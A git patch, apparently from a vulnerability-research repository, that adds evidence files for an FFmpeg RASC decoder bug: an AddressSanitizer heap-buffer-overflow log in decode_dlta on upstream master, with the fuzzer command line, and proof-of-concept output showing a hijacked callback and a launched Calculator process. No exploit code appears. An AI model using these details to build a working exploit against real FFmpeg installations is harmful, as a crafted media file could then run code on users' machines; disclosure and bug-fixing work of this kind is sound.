From d8596f8fc77e0afcf959eb72720deb75e3d3e23e Mon Sep 17 00:00:00 2001 From: Church of Malware <3+ek0ms@noreply.git.churchofmalware.org> Date: Mon, 29 Jun 2026 16:41:06 +0000 Subject: [PATCH] Upload files to "ffmpeg-rasc-dlta-calc-poc/evidence" --- .../evidence/current-master-asan.txt | 32 +++++++++++++++++++ .../evidence/local-calc-pop.txt | 16 ++++++++++ 2 files changed, 48 insertions(+) create mode 100644 ffmpeg-rasc-dlta-calc-poc/evidence/current-master-asan.txt create mode 100644 ffmpeg-rasc-dlta-calc-poc/evidence/local-calc-pop.txt diff --git a/ffmpeg-rasc-dlta-calc-poc/evidence/current-master-asan.txt b/ffmpeg-rasc-dlta-calc-poc/evidence/current-master-asan.txt new file mode 100644 index 0000000..43b8b70 --- /dev/null +++ b/ffmpeg-rasc-dlta-calc-poc/evidence/current-master-asan.txt @@ -0,0 +1,32 @@ +FFmpeg upstream master +bcd2c69e087a09b07cf45c6bd2428ee1ccb2925c +target_dec_rasc_fuzzer sha256 1a69d27a5e06673832bd677189d790cb3cae98de1ba15b1600f3cb98d9510cb9 +rasc-dlta-oob-64.bin sha256 80e670d8986992e1dad50c0df554d9826d81d9413fd43be95be431f15c4cf67e + +ASAN_OPTIONS=allocator_may_return_null=1 ./target_dec_rasc_fuzzer ./rasc-dlta-oob-64.bin + +==513==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50a000000442 +READ of size 4 at 0x50a000000442 thread T0 + #0 decode_dlta build/src/libavcodec/rasc.c:421:17 + #1 decode_frame build/src/libavcodec/rasc.c:712:19 + #2 decode_simple_internal build/src/libavcodec/decode.c:451:16 + #3 decode_simple_receive_frame build/src/libavcodec/decode.c:611:15 + #4 ff_decode_receive_frame_internal build/src/libavcodec/decode.c:647:15 + #5 decode_receive_frame_internal build/src/libavcodec/decode.c:665:15 + #6 avcodec_send_packet build/src/libavcodec/decode.c:749:15 + #7 LLVMFuzzerTestOneInput build/src/tools/target_dec_fuzzer.c:576:25 + +0x50a000000442 is located 2 bytes after 64-byte region [0x50a000000400,0x50a000000440) +allocated by thread T0 here: + #0 posix_memalign + #1 av_malloc build/src/libavutil/mem.c:107:9 + #2 av_buffer_alloc build/src/libavutil/buffer.c:82:12 + #3 av_buffer_allocz build/src/libavutil/buffer.c:95:24 + #4 fuzz_video_get_buffer build/src/tools/target_dec_fuzzer.c:145:29 + #5 fuzz_get_buffer2 build/src/tools/target_dec_fuzzer.c:168:18 + #6 ff_get_buffer build/src/libavcodec/decode.c:1818:11 + #7 init_frames build/src/libavcodec/rasc.c:107:16 + #8 decode_fint build/src/libavcodec/rasc.c:162:11 + #9 decode_frame build/src/libavcodec/rasc.c:706:19 + +SUMMARY: AddressSanitizer: heap-buffer-overflow build/src/libavcodec/rasc.c:421:17 in decode_dlta diff --git a/ffmpeg-rasc-dlta-calc-poc/evidence/local-calc-pop.txt b/ffmpeg-rasc-dlta-calc-poc/evidence/local-calc-pop.txt new file mode 100644 index 0000000..3e111ff --- /dev/null +++ b/ffmpeg-rasc-dlta-calc-poc/evidence/local-calc-pop.txt @@ -0,0 +1,16 @@ +PoC output: +[addr] benign_callback=0x5fec957072c9 +[addr] calc_callback=0x5fec957072e3 +[ptr] frame1 callback after decode=0x5fec957072c9 +[ptr] frame2 callback after decode=0x5fec957072e3 +[ptr] expected target=0x5fec957072e3 +[ok] media-controlled RASC DLTA overwrite redirected callback +[callback] hijacked callback reached +marker:present + +Windows processes after PoC: + +ProcessName Id StartTime +----------- -- --------- +ApplicationFrameHost 24728 6/25/2026 9:55:34 PM +CalculatorApp 26628 6/26/2026 12:25:53 PM